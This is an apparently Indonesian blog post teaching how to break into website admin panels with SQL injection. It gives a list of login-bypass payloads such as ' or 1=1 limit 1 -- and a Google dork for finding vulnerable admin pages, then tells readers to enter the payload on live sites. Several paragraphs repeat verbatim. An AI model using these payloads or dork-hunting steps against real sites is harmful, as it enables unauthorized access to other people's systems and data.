CARA HACK QUERY STRING BYPASS ADMIN LOGIN
Cara Hack Query String Bypass Admin Login
Di postingan kali ini saya akan share mengenai hack ni gan .
saya akan share tentang " Hack Query String Bypass Admin Login".
Sebelum ke cara nya ., ente harus tahu dulu apa itu query string bypass., ok langsung saya akan jelaskan berikut ini :
Sebelum ke cara nya ., ente harus tahu dulu apa itu query string bypass., ok langsung saya akan jelaskan berikut ini :
Query String Bypass Admin Login adalah suatu perintah sql dimana system akan mengeksekusi menjadi query dari user:pass administrator untuk masuk ke halaman admin panel.
query itu sendiri ' or 1=1 limit 1 -- -+ <~
Hal tersebut terjadi karena form login tersebut dicek dengan menggunakan perintah :
' or 1=1-- " or 1=1—or 0=0 -- ' or 1=1 #" or 1=1 #
or 0=0 #' or 'x' = 'x " or "x" = "x') or ('x' = 'x ' or 1=1--" or 1=1--
or 1=1--" or a=a--
Lebih jelas kita simak baik baik berikut ini .
langkah Pertama seperti biasa kita akan memanfaatkan google , mumpung buka 24 jam kita manfaatkan gan :)
#Dork : inurl:admin/index.php
query itu sendiri ' or 1=1 limit 1 -- -+ <~
Hal tersebut terjadi karena form login tersebut dicek dengan menggunakan perintah :
"SELECT * FROM user WHERE username = '$username' AND password = '$password'"
Sehingga jika variabel username diberi input (' or 1=1--), maka query SQLnya akan menjadi
"SELECT * FROM user WHERE username = '' or 1=1--' AND password = ''"
Pernyataan 1=1 akan membuat query tersebut selalu mengembalikan nilai TRUE untuk pernyataan tersebut. Karakter double sign setelah username akan membuat pemeriksaan terhadap password akan diabaikan sehingga penyusup tidak perlu memasukan password.Selain dengan String tersebut, beberapa String berikut juga biasa digunakan untuk mengecek adakah celah keamanan pada suatu form login. String – string tersebut adalah:
' or 1=1-- " or 1=1—or 0=0 -- ' or 1=1 #" or 1=1 #
or 0=0 #' or 'x' = 'x " or "x" = "x') or ('x' = 'x ' or 1=1--" or 1=1--
or 1=1--" or a=a--
Lebih jelas kita simak baik baik berikut ini .
langkah Pertama seperti biasa kita akan memanfaatkan google , mumpung buka 24 jam kita manfaatkan gan :)
#Dork : inurl:admin/index.php
ente langsung saja pilih link yang sekiranya vuln.
Tampilan dengan contoh saya, perharian gan ini tampilan bisa berbeda-beda ,
Contoh punya saya :
kemudian pada kotak user dan passwordnya masukan query : ' or 1=1 limit 1 -- -+ <~
Jika vuln , secara otomatis jika kita klik login maka akan menuju kehalaman admin panelnya.
begitulah cara hack nya gan..
Demikian lah cara hack query string bypass admin login nya gan., sampai jumpa di tips dan trik selanjutnya..
Tampilan dengan contoh saya, perharian gan ini tampilan bisa berbeda-beda ,
Contoh punya saya :
kemudian pada kotak user dan passwordnya masukan query : ' or 1=1 limit 1 -- -+ <~
Jika vuln , secara otomatis jika kita klik login maka akan menuju kehalaman admin panelnya.
begitulah cara hack nya gan..
Demikian lah cara hack query string bypass admin login nya gan., sampai jumpa di tips dan trik selanjutnya..
Mohon maaf bila ada kata-kata yang kurang berkenan di agan-agan semuanya..
Semoga bermanfaat.
Wassalamualaikum Wr.Wb.
CARA HACK QUERY STRING BYPASS ADMIN LOGIN
Reviewed by Unknown
on
08.49.00
Rating:
mantab banget gan
BalasHapusTang jepit